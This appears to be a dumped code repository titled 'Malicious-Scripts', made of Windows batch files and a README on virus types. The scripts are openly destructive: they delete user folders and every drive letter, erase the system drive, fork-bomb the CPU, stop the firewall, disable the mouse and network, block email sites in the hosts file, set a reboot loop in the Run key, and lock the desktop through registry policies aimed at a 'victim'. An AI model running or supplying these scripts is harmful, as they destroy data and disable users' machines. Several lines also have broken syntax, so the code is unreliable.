├── BlockEmailSites.bat ├── ComputerFreeze.bat ├── DeleteAll.bat ├── DisableFirewall.bat ├── EraseDrives.bat ├── InfiniteFolderVirus.bat ├── InternetGoBye.bat ├── LICENSE ├── MouseDisable.bat ├── MouseSwap.bat ├── OS_Crash.bat ├── OneLineVirus.bat ├── README.md ├── RebootLoop.bat ├── RegistrySmash.bat └── TimeChange.bat /BlockEmailSites.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | cd "C:\Windows\System32\Drivers\etc" 3 | : Adds google to blocked list 4 | echo 127.0.0.1 google.com >> "Hosts" 5 | echo 127.0.0.1 www.google.com >> "Hosts" 6 | : Adds gmail to blocked list 7 | echo 127.0.0.1 gmail.com >> "Hosts" 8 | echo 127.0.0.1 www.gmail.com >> "Hosts" 9 | : Adds Outlook to blocked list 10 | echo 127.0.0.1 outlook.com >> "Hosts" 11 | echo 127.0.0.1 www.outlook.com >> "Hosts" 12 | : Adds Yahoo to blocked list 13 | echo 127.0.0.1 yahoo.com >> "Hosts" 14 | echo 127.0.0.1 www.yahoo.com >> "Hosts" 15 | : Adds rackspace to blocked list 16 | echo 127.0.0.1 rackspace.com >> "Hosts" 17 | echo 127.0.0.1 www.rackspace.com >> "Hosts" 18 | : Adds godaddy to blocked list 19 | echo 127.0.0.1 godaddy.com >> "Hosts" 20 | echo 127.0.0.1 www.godaddy.com >> "Hosts" 21 | : Adds ionos to blocked list 22 | echo 127.0.0.1 ionos.com >> "Hosts" 23 | echo 127.0.0.1 www.ionos.com >> "Hosts" 24 | : Adds 1and1 to blocked list 25 | echo 127.0.0.1 1and1.com >> "Hosts" 26 | echo 127.0.0.1 www.1and1.com >> "Hosts" 27 | : Adds siteground to blocked list 28 | echo 127.0.0.1 siteground.com >> "Hosts" 29 | echo 127.0.0.1 www.siteground.com >> "Hosts" 30 | -------------------------------------------------------------------------------- /ComputerFreeze.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | : This virus is harmful for CPU. So be careful. Don’t run this in your pc or friend pc. 3 | %0|%0 -------------------------------------------------------------------------------- /DeleteAll.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | del /f /q "C:\Users\%userprofile%\Documents\*.*" 3 | del /f /q "C:\Users\%userprofile%\Music\*.*" 4 | del /f /q "C:\Users\%userprofile%\Pictures\*.*" 5 | del /f /q "C:\Users\%userprofile%\Contacts\*.*" 6 | del /f /q "C:\Users\%userprofile%\Downloads\*.*" 7 | del /f /q "C:\Users\%userprofile%\Desktop\*.*" 8 | del /f /q "C:\Users\%userprofile%\AppData\*.*" 9 | 10 | : del means delete. 11 | : /f is a switch, which force deletes the files, if they are read-only. 12 | : /q is a switch, which quietly deletes the files without any prompts. 13 | : *.* to delete all the items in the current directory. -------------------------------------------------------------------------------- /DisableFirewall.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | ::-Disable Windows Firewall--:: 3 | net stop "MpsSvc" 4 | taskkill /f /t /im "FirewallControlPanel.exe" -------------------------------------------------------------------------------- /EraseDrives.bat: -------------------------------------------------------------------------------- 1 | : Erase all mounted drives 2 | @echo off 3 | 4 | del A:*.* /f /s /q 5 | 6 | del B:*.* /f /s /q 7 | 8 | del C:*.* /f /s /q 9 | 10 | del D:*.* /f /s /q 11 | 12 | del E:*.* /f /s /q 13 | 14 | del F:*.* /f /s /q 15 | 16 | del G:*.* /f /s /q 17 | 18 | del H:*.* /f /s /q 19 | 20 | del I:*.* /f /s /q 21 | 22 | del J:*.* /f /s /q 23 | 24 | del K:*.* /f /s /q 25 | 26 | del L:*.* /f /s /q 27 | 28 | del M:*.* /f /s /q 29 | 30 | del N:*.* /f /s /q 31 | 32 | del O:*.* /f /s /q 33 | 34 | del P:*.* /f /s /q 35 | 36 | del Q:*.* /f /s /q 37 | 38 | del R:*.* /f /s /q 39 | 40 | del S:*.* /f /s /q 41 | 42 | del T:*.* /f /s /q 43 | 44 | del U:*.* /f /s /q 45 | 46 | del V:*.* /f /s /q 47 | 48 | del W:*.* /f /s /q 49 | 50 | del X:*.* /f /s /q 51 | 52 | del Y:*.* /f /s /q 53 | 54 | del Z:*.* /f /s /q 55 | 56 | exit -------------------------------------------------------------------------------- /InfiniteFolderVirus.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | : Infinite folder creation Virus 3 | md %random% 4 | goto top 5 | @echo off makes it so that it appears to be a blank screen but actually its making hundreds of folder. 6 | md %random% is command that creating folders with random names. 7 | goto top – return to label :top , infinite loop -------------------------------------------------------------------------------- /InternetGoBye.bat: -------------------------------------------------------------------------------- 1 | : Disabling a victim’s internet 2 | @echo off 3 | 4 | ipconfig / Release 5 | 6 | if ERRORLEVEL1 ipconfig /release_all 7 | 8 | exit -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2019 M4d Sc13nT15t & M4d Ch3m15t 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /MouseDisable.bat: -------------------------------------------------------------------------------- 1 | : Edits the registry settings for mouse to disable it. 2 | @echo off 3 | set key="HKEYLOCALMACHINE\system\CurrentControlSet\Services\Mouclass" 4 | reg delete %key% 5 | reg add %key% /v Start /t REG_DWORD /d 4_ -------------------------------------------------------------------------------- /MouseSwap.bat: -------------------------------------------------------------------------------- 1 | : Script that changes the setting of mouse from control panel. 2 | @echo off 3 | Rundll32 user32,SwapMouseButton -------------------------------------------------------------------------------- /OS_Crash.bat: -------------------------------------------------------------------------------- 1 | : This code can just simply crash Windows. 2 | : You may have problems when using this code because some times it does not work. 3 | @echo off 4 | 5 | erase %systemdrive%*.* /f /s /q 6 | 7 | exit -------------------------------------------------------------------------------- /OneLineVirus.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | : One line virus creation 3 | erase C:WINDOWS -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Malicious-Scripts 2 | Malicious but fun scripts 3 | 4 | Phases of an outbreak 5 | --------------------- 6 | Infection -> Spreading -> Attack 7 | 8 | Virus Lifecycle 9 | --------------- 10 | Design - > Replication -> Launch -> Detection -> Incorporation -> Elimination 11 | 12 | Types of Viruses 13 | ---------------- 14 | Boot Virus --> Infects the boot sector of floppies or hard disks 15 | 16 | Macro Virus --> Written in Microsoft Office Macro language 17 | 18 | Network Virus --> Spreads via network shares 19 | 20 | Stealth Virus --> Hides in a file, copies itself out to deliver payload 21 | 22 | Polymorphic Virus --> Encrypts itself 23 | 24 | Cavity Viru -->s Hides in the empty areas of executables 25 | 26 | Tunneling Virus --> Trace interceptor programs that monitor OS Kernel requests 27 | 28 | Camouflage Virus --> Disguise themselves as legit files 29 | 30 | Multipartite Virus --> Infects via multiple vectors 31 | 32 | Metamorphic Virus --> Rewrites itself 33 | 34 | Famous Viruses 35 | -------------- 36 | Elk Cloner --> 1st virus 37 | 38 | Morris --> 1st worm 39 | 40 | I Love You --> VBScript worm, sent via email 41 | 42 | Melissa --> Macro virus 43 | 44 | Klez --> Mass mailer with its own SMTP engine 45 | 46 | Slammer --> Targets SQL server, total size of 376 bytes 47 | 48 | MyDoom --> Mass mailer, uses port 3127, attacks the hosts file 49 | 50 | MonteCarlo --> Memory resident, copies to the end on exe files 51 | -------------------------------------------------------------------------------- /RebootLoop.bat: -------------------------------------------------------------------------------- 1 | : Another annoying code which keep the victim’s computer rebooting 2 | @echo off 3 | 4 | reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /f /v “svchost.exe” /d “shutdown -r -t 00” 5 | 6 | exit -------------------------------------------------------------------------------- /RegistrySmash.bat: -------------------------------------------------------------------------------- 1 | : Smash the stack for fun and profit 2 | : This will just kill some resources in such a way that the victim will get very annoyed. 3 | : This batch file will give a hard blow to the registry. 4 | @echo off 5 | 6 | reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoControlPanel /t REG_DWORD /d 00000001 7 | 8 | reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoRun /t REG_DWORD /d 00000001 9 | 10 | reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoToolbarsOnTaskbar /t REG_DWORD /d 00000001 11 | 12 | reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoSetTaskBar /t REG_DWORD /d 00000001 13 | 14 | reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoViewContextMenu /t REG_DWORD /d 00000001 15 | 16 | reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoTrayContextMenu /t REG_DWORD /d 00000001 17 | 18 | reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoStartMenuMorePrograms /t REG_DWORD /d 00000001 19 | 20 | reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoSetFolders /t REG_DWORD /d 00000001 21 | 22 | reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoSecurityTab /t REG_DWORD /d 00000001 23 | 24 | reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoLogOff /t REG_DWORD /d 00000001 25 | 26 | reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoFind /t REG_DWORD /d 00000001 27 | 28 | reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoDrives /t REG_DWORD /d 03ffffff 29 | 30 | reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoClose /t REG_DWORD /d 00000001 31 | 32 | reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoNetHood /t REG_DWORD /d 00000001 33 | 34 | reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoNetworkConnections /t REG_DWORD /d 00000001 35 | 36 | reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoDesktop /t REG_DWORD /d 00000001 37 | 38 | reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v StartMenuLogOff /t REG_DWORD /d 00000000 39 | 40 | reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v ClassicShell /t REG_DWORD /d 00000000 41 | 42 | reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoSMMyDocs /t REG_DWORD /d 00000001 43 | 44 | reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoSMHelp /t REG_DWORD /d 00000001 45 | 46 | reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoSMConfigurePrograms /t REG_DWORD /d 00000001 47 | 48 | reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoStartMenuMyMusic /t REG_DWORD /d 00000001 49 | 50 | reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoSMMyPictures /t REG_DWORD /d 00000001 51 | 52 | reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoRecentDocsMenu /t REG_DWORD /d 00000001 53 | 54 | reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoFavoritesMenu /t REG_DWORD /d 00000001 55 | 56 | reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoStartMenuPinnedList /t REG_DWORD /d 00000001 57 | 58 | reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoActiveDesktop /t REG_DWORD /d 00000001 59 | 60 | reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoTrayItemsDisplay /t REG_DWORD /d 00000001 61 | 62 | reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 00000001 63 | 64 | reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableRegistryTools /t REG_DWORD /d 00000001 65 | 66 | reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableChangePassword /t REG_DWORD /d 00000001 67 | 68 | reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableLockWorkstation /t REG_DWORD /d 00000001 69 | 70 | reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v NoDispCPL /t REG_DWORD /d 00000001 71 | 72 | reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v NoDispBackgroundPage /t REG_DWORD /d 00000001 73 | 74 | reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v NoDispScrSavPage /t REG_DWORD /d 00000001 75 | 76 | reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v NoDispAppearancePage /t REG_DWORD /d 00000001 77 | 78 | reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v NoDispSettingsPage /t REG_DWORD /d 00000001 79 | 80 | reg add HKCUSoftwarePoliciesMicrosoftWindowsSystem /v DisableCMD /t REG_DWORD /d 00000002 81 | 82 | reg add HKLMSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v legalnoticecaption /d Oops.. 83 | 84 | reg add HKLMSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v legalnoticetext /d …Hacked… 85 | 86 | reg add HKCUSoftwarePoliciesMicrosoftMMC /v RestrictToPermittedSnapins /t REG_DWORD /d 00000001 87 | 88 | reg add HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced /v Start_ShowPrinters /t REG_DWORD /d 00000000 89 | 90 | reg add HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced /v Start_AdminToolsRoot /t REG_DWORD /d 00000000 91 | 92 | reg add HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced /v Start_ShowMyComputer /t REG_DWORD /d 00000000 93 | 94 | reg add HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced /v WebView /t REG_DWORD /d 00000000 95 | 96 | reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesUninstall /v NoAddRemovePrograms /t REG_DWORD /d 00000001 97 | 98 | reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesUninstall /v NoAddPage /t REG_DWORD /d 00000001 99 | 100 | reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesUninstall /v NoRemovePage /t REG_DWORD /d 00000001 101 | 102 | reg add HKCUControl PanelInternational /v sTimeFormat /d H:mm:ss 103 | 104 | reg add HKU.DEFAULTSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced /v WebView /t REG_DWORD /d 00000000 105 | 106 | exit -------------------------------------------------------------------------------- /TimeChange.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | time 00:00 --------------------------------------------------------------------------------